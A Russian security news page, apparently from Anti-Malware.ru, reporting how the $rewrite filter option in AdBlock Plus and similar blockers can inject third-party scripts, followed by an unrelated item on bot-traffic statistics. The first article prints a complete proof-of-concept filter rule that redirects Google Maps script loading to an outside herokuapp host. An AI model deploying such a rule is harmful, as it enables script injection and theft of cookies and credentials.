Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Новый эксплойт, недавно обнаруженный экспертом в области кибербезопасности, способен использовать фильтры популярных блокировщиков рекламы Adblock Plus, AdBlock и uBlocker для инъекции сторонних скриптов в код страниц веб-сайтов.

Adblock Plus, AdBlock и uBlocker представляют собой специальные расширения для браузеров, помогающие пользователям скрывать надоедливую и агрессивную рекламу со страниц ресурсов.

База пользователей этих блокировщиков насчитывает более 10 миллионов человек. Таким образом, если злоумышленнику удастся внедрить вредоносные скрипты, он получит возможность красть файлы cookie, учетные данные, а также осуществлять нужные ему редиректы.

Работа блокировщиков рекламы завязана на использовании списка URL, на которых был отмечен рекламный контент или даже вредоносное поведение. Тот же Adblock Plus, например, запрещает браузеру подключаться к этим ссылкам, следовательно, рекламные скрипты не в состоянии загрузиться.

Вся проблема кроется в опции списка фильтров под названием $rewrite, которая была представлена в 2018 году (в Adblocker Plus 3.2). Эта функция позволяет разработчику подменить запрос, совпадающий с определенным регулярным выражением, другим URL.

Единственное условие — заменяемая строка должна быть относительным URL-адресом. Таким образом, если запрос для example.com/ad.gif заменить на example.com/puppies.gif, пользователь вместо рекламы увидит картинку с милыми щенками.

При этом разработчики предусмотрели защиту, запретив запросы вида SCRIPT, SUBDOCUMENT, OBJECT и OBJECT_SUBREQUEST — с ними эта функция не будет работать.

Однако исследователь Армин Себастьян нашел способ, позволяющий создать правило, благодаря которому сторонний скрипт можно встроить в контент конкретного сайта.

Для этого потребуется найти ресурс, который допускает загрузку скриптов со сторонних доменов, а также использует XMLHttpRequest или Fetch для загрузки скриптов. Сам Себастьян довольно быстро нашел такой ресурс — он использовал Google Maps для демонстрации уязвимости.

Google Maps использует XMLHttpRequest для загрузки скриптов, что позволило эксперту воспользоваться функцией фильтров $rewrite для задействования скрипта со стороннего домена. Пример:

/^https://www.google.com/maps/_/js/k=.*/m=pw/.*/rs=.*/$rewrite=/search?hl=en-US&source=hp&biw=&bih=&q=majestic-ramsons.herokuapp.com&btnI=I%27m+Feeling+Lucky&gbv=1

Если пользователь в этом случае посетит google[.]com/maps/, фильтр использует редиректы Google для считывания контента с majestic-ramsons.herokuapp[.]com/.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Россия стала главным источником бот-трафика против российский компаний

Эксперты StormWall опубликовали новое исследование по вредоносному бот-трафику, который в третьем квартале 2025 года атаковал российские компании. Итоги, мягко говоря, тревожные: объем такого трафика вырос в 1,7 раза по сравнению с аналогичным периодом прошлого года.

Специалисты объясняют рост сразу несколькими факторами — увеличением числа уязвимых сетевых устройств, общей геополитической ситуацией и активностью хактивистов. В анализ вошли данные клиентов StormWall.

По наблюдениям исследователей, в топ-3 источников вредоносного бот-трафика вошли Россия (22,42%), США (18,84%) и Индонезия (10,24%). Причём Россия впервые стала главным генератором бот-трафика, который направлен на отечественные компании. Далее в рейтинге идут Китай (6,56%) и Бразилия (5,92%).

Отдельно аналитики отметили, что объём вредоносного трафика с российских IP-адресов за год вырос на 39%. Если в третьем квартале 2024 года было зафиксировано 1,74 млн таких IP-источников, то в третьем квартале 2025 года — уже 2,42 млн.

Следом по доле бот-трафика размещаются Украина (5,28%), Колумбия (3,90%), Индия (3,79%), Казахстан (3,74%) и Таиланд (3,54%).

Сильнее всего от бот-трафика пострадали финансовый сектор, ретейл, телеком, логистика и индустрия развлечений. Российскому бизнесу это принесло ощутимые проблемы: перебои в работе онлайн-сервисов, финансовые потери, штрафы по SLA, рост расходов на кибербезопасность, а также репутационные риски и отток клиентов.

CEO и сооснователь StormWall Рамиль Хантимиров отмечает, что боты уже проникли практически во все ключевые отрасли. По его словам, злоумышленники активно используют их для массовых DDoS-атак ради коммерческой выгоды.

Компании, считает эксперт, нуждаются в инструментах, которые позволят блокировать угрозы от ботов, но останутся незаметными для добросовестных пользователей. Это поможет организациям сосредоточиться на работе и развитии бизнеса, а не на постоянном «тушении пожаров».

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru